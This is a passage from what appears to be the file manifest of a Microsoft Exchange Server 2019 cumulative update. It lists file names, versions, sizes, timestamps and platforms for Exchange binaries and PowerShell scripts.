Not applicable| 14,018| 12-Aug-2020| 21:27| Not applicable \nUpdatecas.ps1| Not applicable| 35,786| 12-Aug-2020| 21:27| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,730| 12-Aug-2020| 21:27| Not applicable \nUpdateserver.exe| 15.2.659.6| 3,014,528| 12-Aug-2020| 21:27| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,144| 12-Aug-2020| 21:26| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 31,813| 12-Aug-2020| 21:27| Not applicable \nWsbexchange.exe| 15.2.659.6| 125,320| 12-Aug-2020| 21:26| x64 \nX400prox.dll| 15.2.659.6| 103,296| 12-Aug-2020| 21:27| x64 \n_search.lingoperators.a| 15.2.659.6| 34,688| 12-Aug-2020| 21:26| Not applicable \n_search.lingoperators.b| 15.2.659.6| 34,688| 12-Aug-2020| 21:26| Not applicable \n_search.mailboxoperators.a| 15.2.659.6| 290,176| 12-Aug-2020| 21:26| Not applicable \n_search.mailboxoperators.b| 15.2.659.6| 290,176| 12-Aug-2020| 21:26| Not applicable \n_search.operatorschema.a| 15.2.659.6| 485,752| 12-Aug-2020| 21:25| Not applicable \n_search.operatorschema.b| 15.2.659.6| 485,752| 12-Aug-2020| 21:25| Not applicable \n_search.tokenoperators.a| 15.2.659.6| 113,544| 12-Aug-2020| 21:25| Not applicable \n_search.tokenoperators.b| 15.2.659.6| 113,544| 12-Aug-2020| 21:25| Not applicable \n_search.transportoperators.a| 15.2.659.6| 67,976| 12-Aug-2020| 21:25| Not applicable \n_search.transportoperators.b| 15.2.659.6| 67,976| 12-Aug-2020| 21:25| Not applicable \n \n## \n\n__\n\nExchange Server 2019 Cumulative Update 5\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.2.595.6| 71,040| 12-Aug-2020| 20:45| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,506| 12-Aug-2020| 20:41| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,929| 12-Aug-2020| 20:42| Not applicable \nAdemodule.dll| 15.2.595.6| 106,368| 12-Aug-2020| 20:41| x64 \nAirfilter.dll| 15.2.595.6| 42,880| 12-Aug-2020| 20:41| x64 \nAjaxcontroltoolkit.dll| 15.2.595.6| 92,552| 12-Aug-2020| 20:41| x86 \nAntispamcommon.ps1| Not applicable| 13,489| 12-Aug-2020| 20:42| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 12-Aug-2020| 20:41| Not applicable \nAsentirs.msi| Not applicable| 77,824| 12-Aug-2020| 20:41| Not applicable \nAsentsig.msi| Not applicable| 73,728| 12-Aug-2020| 20:41| Not applicable \nBigfunnel.bondtypes.dll| 15.2.595.6| 45,440| 12-Aug-2020| 20:42| x86 \nBigfunnel.common.dll| 15.2.595.6| 66,432| 12-Aug-2020| 20:41| x86 \nBigfunnel.configuration.dll| 15.2.595.6| 118,152| 12-Aug-2020| 20:45| x86 \nBigfunnel.entropy.dll| 15.2.595.6| 44,424| 12-Aug-2020| 20:45| x86 \nBigfunnel.filter.dll| 15.2.595.6| 54,144| 12-Aug-2020| 20:41| x86 \nBigfunnel.indexstream.dll| 15.2.595.6| 69,000| 12-Aug-2020| 20:41| x86 \nBigfunnel.neuraltree.dll| Not applicable| 694,152| 12-Aug-2020| 20:41| x64 \nBigfunnel.neuraltreeranking.dll| 15.2.595.6| 19,848| 12-Aug-2020| 20:42| x86 \nBigfunnel.poi.dll| 15.2.595.6| 245,120| 12-Aug-2020| 20:41| x86 \nBigfunnel.postinglist.dll| 15.2.595.6| 189,312| 12-Aug-2020| 20:41| x86 \nBigfunnel.query.dll| 15.2.595.6| 101,248| 12-Aug-2020| 20:41| x86 \nBigfunnel.ranking.dll| 15.2.595.6| 109,448| 12-Aug-2020| 20:41| x86 \nBigfunnel.syntheticdatalib.dll| 15.2.595.6| 3,634,552| 12-Aug-2020| 20:41| x86 \nBigfunnel.tracing.dll| 15.2.595.6| 42,880| 12-Aug-2020| 20:41| x86 \nBigfunnel.wordbreakers.dll| 15.2.595.6| 46,472| 12-Aug-2020| 20:45| x86 \nCafe_airfilter_dll| 15.2.595.6| 42,880| 12-Aug-2020| 20:41| x64 \nCafe_exppw_dll| 15.2.595.6| 83,328| 12-Aug-2020| 20:42| x64 \nCafe_owaauth_dll| 15.2.595.6| 92,032| 12-Aug-2020| 20:42| x64 \nCalcalculation.ps1| Not applicable| 42,097| 12-Aug-2020| 20:41| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,622| 12-Aug-2020| 20:41| Not applicable \nChksgfiles.dll| 15.2.595.6| 57,224| 12-Aug-2020| 20:41| x64 \nCitsconstants.ps1| Not applicable| 15,805| 12-Aug-2020| 20:42| Not applicable \nCitslibrary.ps1| Not applicable| 82,680| 12-Aug-2020| 20:42| Not applicable \nCitstypes.ps1| Not applicable| 14,480| 12-Aug-2020| 20:42| Not applicable \nClassificationengine_mce| 15.2.595.6| 1,693,056| 12-Aug-2020| 20:41| Not applicable \nClusmsg.dll| 15.2.595.6| 134,024| 12-Aug-2020| 20:41| x64 \nCoconet.dll| 15.2.595.6| 48,000| 12-Aug-2020| 20:41| x64 \nCollectovermetrics.ps1| Not applicable| 81,644| 12-Aug-2020| 20:41| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,886| 12-Aug-2020| 20:41| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,947| 12-Aug-2020| 20:42| Not applicable \nComplianceauditservice.exe| 15.2.595.6| 39,808| 12-Aug-2020| 20:41| x86 \nConfigureadam.ps1| Not applicable| 22,764| 12-Aug-2020| 20:42| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,308| 12-Aug-2020| 20:42| Not applicable \nConfigurecryptodefaults.ps1| Not applicable| 42,039| 12-Aug-2020| 20:41| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,770| 12-Aug-2020| 20:42| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,828| 12-Aug-2020| 20:42| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,283| 12-Aug-2020| 20:43| Not applicable \nConnectfunctions.ps1| Not applicable| 37,141| 12-Aug-2020| 20:46| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 29,620| 12-Aug-2020| 20:45| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,232| 12-Aug-2020| 20:44| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,053| 12-Aug-2020| 20:42| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,532| 12-Aug-2020| 20:42| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,765| 12-Aug-2020| 20:42| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,912| 12-Aug-2020| 20:42| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 17:59| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 17:59| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 17:59| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 17:59| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 17:59| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 17:59| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 17:59| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 17:59| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 17:59| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 17:59| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 17:59| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 17:59| Not applicable \nCts_exsmime.dll| 15.2.595.6| 380,800| 12-Aug-2020| 20:46| x64 \nCts_microsoft.exchange.data.common.dll| 15.2.595.6| 1,686,392| 12-Aug-2020| 20:42| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 17:59| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:41| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:41| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:42| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:41| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:41| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:41| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:41| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.2.595.6| 12,664| 12-Aug-2020| 20:41| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:41| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:41| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.2.595.6| 12,680| 12-Aug-2020| 20:41| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.2.595.6| 12,680| 12-Aug-2020| 20:41| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:41| x86 \nDagcommonlibrary.ps1| Not applicable| 60,242| 12-Aug-2020| 20:41| Not applicable \nDependentassemblygenerator.exe| 15.2.595.6| 22,400| 12-Aug-2020| 20:46| x86 \nDiaghelper.dll| 15.2.595.6| 66,944| 12-Aug-2020| 20:43| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,334| 12-Aug-2020| 20:42| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,362| 12-Aug-2020| 20:42| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,189| 12-Aug-2020| 20:42| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,654| 12-Aug-2020| 20:42| Not applicable \nDisklockerapi.dll| Not applicable| 22,400| 12-Aug-2020| 20:42| x64 \nDlmigrationmodule.psm1| Not applicable| 39,580| 12-Aug-2020| 20:42| Not applicable \nDsaccessperf.dll| 15.2.595.6| 45,944| 12-Aug-2020| 20:42| x64 \nDscperf.dll| 15.2.595.6| 32,648| 12-Aug-2020| 20:41| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.2.595.6| 1,686,392| 12-Aug-2020| 20:42| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.2.595.6| 601,480| 12-Aug-2020| 20:41| x86 \nEcpperfcounters.xml| Not applicable| 30,352| 12-Aug-2020| 20:43| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 17:59| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:41| x86 \nEdgetransport.exe| 15.2.595.6| 49,536| 12-Aug-2020| 20:41| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 17:59| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 17:59| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 17:59| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 17:59| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 17:59| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 17:59| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 17:59| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 17:59| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 17:59| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 17:59| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 17:59| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 17:59| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.2.595.6| 12,664| 12-Aug-2020| 20:41| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:45| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:41| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.2.595.6| 12,680| 12-Aug-2020| 20:45| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:41| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:41| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:41| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:41| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.2.595.6| 13,192| 12-Aug-2020| 20:41| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.2.595.6| 12,680| 12-Aug-2020| 20:42| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:45| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.2.595.6| 12,672| 12-Aug-2020| 20:41| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,364| 12-Aug-2020| 20:42| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,563| 12-Aug-2020| 20:42| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,588| 12-Aug-2020| 20:42| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,598| 12-Aug-2020| 20:43| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,916| 12-Aug-2020| 20:42| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,647| 12-Aug-2020| 20:42| Not applicable \nEngineupdateserviceinterfaces.dll| 15.2.595.6| 17,800| 12-Aug-2020| 20:42| x86 \nEscprint.dll| 15.2.595.6| 20,344| 12-Aug-2020| 20:41| x64 \nEse.dll| 15.2.595.6| 3,741,568| 12-Aug-2020| 20:45| x64 \nEseback2.dll| 15.2.595.6| 350,080| 12-Aug-2020| 20:41| x64 \nEsebcli2.dll| 15.2.595.6| 318,336| 12-Aug-2020| 20:41| x64 \nEseperf.dll| 15.2.595.6| 108,936| 12-Aug-2020| 20:44| x64 \nEseutil.exe| 15.2.595.6| 425,344| 12-Aug-2020| 20:41| x64 \nEsevss.dll| 15.2.595.6| 44,424| 12-Aug-2020| 20:41| x64 \nEtweseproviderresources.dll| 15.2.595.6| 101,248| 12-Aug-2020| 20:41| x64 \nEventperf.dll| 15.2.595.6| 59,784| 12-Aug-2020| 20:42| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,109| 12-Aug-2020| 20:45| Not applicable \nExchange.format.ps1xml| Not applicable| 649,694| 12-Aug-2020| 20:45| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 44,339| 12-Aug-2020| 20:46| Not applicable \nExchange.ps1| Not applicable| 20,807| 12-Aug-2020| 20:46| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,551| 12-Aug-2020| 20:41| Not applicable \nExchange.types.ps1xml| Not applicable| 365,149| 12-Aug-2020| 20:45| Not applicable \nExchangeudfcommon.dll| 15.2.595.6| 122,752| 12-Aug-2020| 20:41| x86 \nExchangeudfs.dll| 15.2.595.6| 272,776| 12-Aug-2020| 20:41| x86 \nExchmem.dll| 15.2.595.6| 86,400| 12-Aug-2020| 20:41| x64 \nExchsetupmsg.dll| 15.2.595.6| 19,328| 12-Aug-2020| 20:45| x64 \nExdbfailureitemapi.dll| Not applicable| 27,008| 12-Aug-2020| 20:41| x64 \nExdbmsg.dll| 15.2.595.6| 230,792| 12-Aug-2020| 20:41| x64 \nExeventperfplugin.dll| 15.2.595.6| 25,480| 12-Aug-2020| 20:42| x64 \nExmime.dll| 15.2.595.6| 364,928| 12-Aug-2020| 20:41| x64 \nExportedgeconfig.ps1| Not applicable| 27,391| 12-Aug-2020| 20:42| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,558| 12-Aug-2020| 20:42| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 29,206| 12-Aug-2020| 20:42| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,378| 12-Aug-2020| 20:41| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,125| 12-Aug-2020| 20:43| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,044| 12-Aug-2020| 20:42| Not applicable \nExppw.dll| 15.2.595.6| 83,328| 12-Aug-2020| 20:42| x64 \nExprfdll.dll| 15.2.595.6| 26,504| 12-Aug-2020| 20:41| x64 \nExrpc32.dll| 15.2.595.6| 2,029,440| 12-Aug-2020| 20:42| x64 \nExrw.dll| 15.2.595.6| 28,032| 12-Aug-2020| 20:41| x64 \nExsetdata.dll| 15.2.595.6| 2,779,528| 12-Aug-2020| 20:41| x64 \nExsetup.exe| 15.2.595.6| 35,200| 12-Aug-2020| 20:41| x86 \nExsetupui.exe| 15.2.595.6| 471,936| 12-Aug-2020| 20:42| x86 \nExtrace.dll| 15.2.595.6| 245,120| 12-Aug-2020| 20:41| x64 \nExt_microsoft.exchange.data.transport.dll| 15.2.595.6| 601,480| 12-Aug-2020| 20:41| x86 \nExwatson.dll| 15.2.595.6| 44,928| 12-Aug-2020| 20:41| x64 \nFastioext.dll| 15.2.595.6| 60,288| 12-Aug-2020| 20:41| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,631| 12-Aug-2020| 20:43| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,261| 12-Aug-2020| 20:42| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,793| 12-Aug-2020| 20:42| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,404| 12-Aug-2020| 20:45| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,656| 12-Aug-2020| 20:45| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,724| 12-Aug-2020| 20:42| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,628| 12-Aug-2020| 20:42| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,604| 12-Aug-2020| 20:42| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 12-Aug-2020| 20:46| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,344| 12-Aug-2020| 20:42| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,258| 12-Aug-2020| 20:42| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,787| 12-Aug-2020| 20:42| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,596,145| 12-Aug-2020| 20:42| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,596,145| 12-Aug-2020| 20:42| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,596,145| 12-Aug-2020| 20:42| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,763| 12-Aug-2020| 20:42| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,793| 12-Aug-2020| 20:42| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,596,145| 12-Aug-2020| 20:42| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,634| 12-Aug-2020| 20:42| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,596,145| 12-Aug-2020| 20:42| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,658| 12-Aug-2020| 20:42| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,790| 12-Aug-2020| 20:42| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,634| 12-Aug-2020| 20:43| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 12-Aug-2020| 20:46| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| 341,881,192| 12-Aug-2020| 20:46| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,742| 12-Aug-2020| 20:42| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,634| 12-Aug-2020| 20:42| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,596,145| 12-Aug-2020| 20:42| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,640| 12-Aug-2020| 20:42| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 12-Aug-2020| 20:47| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,231| 12-Aug-2020| 20:42| Not applicable \nFilteringpowershell.dll| 15.2.595.6| 223,112| 12-Aug-2020| 20:42| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,652| 12-Aug-2020| 20:42| Not applicable \nFiltermodule.dll| 15.2.595.6| 180,104| 12-Aug-2020| 20:41| x64 \nFipexeuperfctrresource.dll| 15.2.595.6| 15,232| 12-Aug-2020| 20:42| x64 \nFipexeventsresource.dll| 15.2.595.6| 44,928| 12-Aug-2020| 20:43| x64 \nFipexperfctrresource.dll| 15.2.595.6| 32,640| 12-Aug-2020| 20:43| x64 \nFirewallres.dll| 15.2.595.6| 72,568| 12-Aug-2020| 20:43| x64 \nFms.exe| 15.2.595.6| 1,350,016| 12-Aug-2020| 20:43| x64 \nForefrontactivedirectoryconnector.exe| 15.2.595.6| 110,968| 12-Aug-2020| 20:46| x64 \nFpsdiag.exe| 15.2.595.6| 18,808| 12-Aug-2020| 20:42| x86 \nFsccachedfilemanagedlocal.dll| 15.2.595.6| 822,152| 12-Aug-2020| 20:42| x64 \nFscconfigsupport.dll| 15.2.595.6| 56,704| 12-Aug-2020| 20:43| x86 \nFscconfigurationserver.exe| 15.2.595.6| 430,976| 12-Aug-2020| 20:43| x64 \nFscconfigurationserverinterfaces.dll| 15.2.595.6| 15,736| 12-Aug-2020| 20:42| x86 \nFsccrypto.dll| 15.2.595.6| 208,768| 12-Aug-2020| 20:42| x64 \nFscipcinterfaceslocal.dll| 15.2.595.6| 28,544| 12-Aug-2020| 20:42| x86 \nFscipclocal.dll| 15.2.595.6| 38,280| 12-Aug-2020| 20:42| x86 \nFscsqmuploader.exe| 15.2.595.6| 453,512| 12-Aug-2020| 20:43| x64 \nGetucpool.ps1| Not applicable| 19,775| 12-Aug-2020| 20:42| Not applicable \nGetvalidengines.ps1| Not applicable| 13,290| 12-Aug-2020| 20:42| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,793| 12-Aug-2020| 20:42| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,639| 12-Aug-2020| 20:42| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,711| 12-Aug-2020| 20:42| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,759| 12-Aug-2020| 20:42| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,482| 12-Aug-2020| 20:42| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,689| 12-Aug-2020| 20:42| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,794| 12-Aug-2020| 20:42| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,336| 12-Aug-2020| 20:42| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,947| 12-Aug-2020| 20:42| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,026| 12-Aug-2020| 20:42| Not applicable \nGet_storetrace.ps1| Not applicable| 51,887| 12-Aug-2020| 20:41| Not applicable \nHuffman_xpress.dll| 15.2.595.6| 32,648| 12-Aug-2020| 20:41| x64 \nImportedgeconfig.ps1| Not applicable| 77,248| 12-Aug-2020| 20:42| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,480| 12-Aug-2020| 20:42| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,818| 12-Aug-2020| 20:42| Not applicable \nInproxy.dll| 15.2.595.6| 85,888| 12-Aug-2020| 20:41| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,523| 12-Aug-2020| 20:41| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,913| 12-Aug-2020| 20:42| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,967| 12-Aug-2020| 20:41| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.595.6| 107,400| 12-Aug-2020| 20:41| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.595.6| 20,360| 12-Aug-2020| 20:45| Not applicable \nInterop.certenroll.dll| 15.2.595.6| 142,720| 12-Aug-2020| 20:41| x86 \nInterop.licenseinfointerface.dll| 15.2.595.6| 14,216| 12-Aug-2020| 20:42| x86 \nInterop.netfw.dll| 15.2.595.6| 34,176| 12-Aug-2020| 20:41| x86 \nInterop.plalibrary.dll| 15.2.595.6| 72,576| 12-Aug-2020| 20:41| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.595.6| 27,008| 12-Aug-2020| 20:41| Not applicable \nInterop.taskscheduler.dll| 15.2.595.6| 46,464| 12-Aug-2020| 20:41| x86 \nInterop.wuapilib.dll| 15.2.595.6| 60,808| 12-Aug-2020| 20:42| x86 \nInterop.xenroll.dll| 15.2.595.6| 39,808| 12-Aug-2020| 20:41| x86 \nKerbauth.dll| 15.2.595.6| 62,848| 12-Aug-2020| 20:41| x64 \nLicenseinfointerface.dll| 15.2.595.6| 643,456| 12-Aug-2020| 20:43| x64 \nLpversioning.xml| Not applicable| 19,638| 12-Aug-2020| 20:41| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,904| 12-Aug-2020| 20:41| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.2.595.6| 138,624| 12-Aug-2020| 20:43| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 126,237| 12-Aug-2020| 20:41| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,340| 12-Aug-2020| 20:41| Not applicable \nManage_metacachedatabase.ps1| Not applicable| 51,087| 12-Aug-2020| 20:42| Not applicable \nMce.dll| 15.2.595.6| 1,693,056| 12-Aug-2020| 20:41| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,487| 12-Aug-2020| 20:41| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,623| 12-Aug-2020| 20:42| Not applicable \nMicrosoft.database.isam.dll| 15.2.595.6| 127,872| 12-Aug-2020| 20:45| x86 \nMicrosoft.dkm.proxy.dll| 15.2.595.6| 25,992| 12-Aug-2020| 20:41| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.2.595.6| 68,488| 12-Aug-2020| 20:41| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.2.595.6| 17,800| 12-Aug-2020| 20:42| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.2.595.6| 233,344| 12-Aug-2020| 20:41| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.2.595.6| 15,752| 12-Aug-2020| 20:42| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.2.595.6| 43,392| 12-Aug-2020| 20:45| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.2.595.6| 1,775,992| 12-Aug-2020| 20:41| x86 \nMicrosoft.exchange.airsync.dll1| 15.2.595.6| 505,224| 12-Aug-2020| 20:41| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.2.595.6| 76,152| 12-Aug-2020| 20:42| x86 \nMicrosoft.exchange.anchorservice.dll| 15.2.595.6| 135,560| 12-Aug-2020| 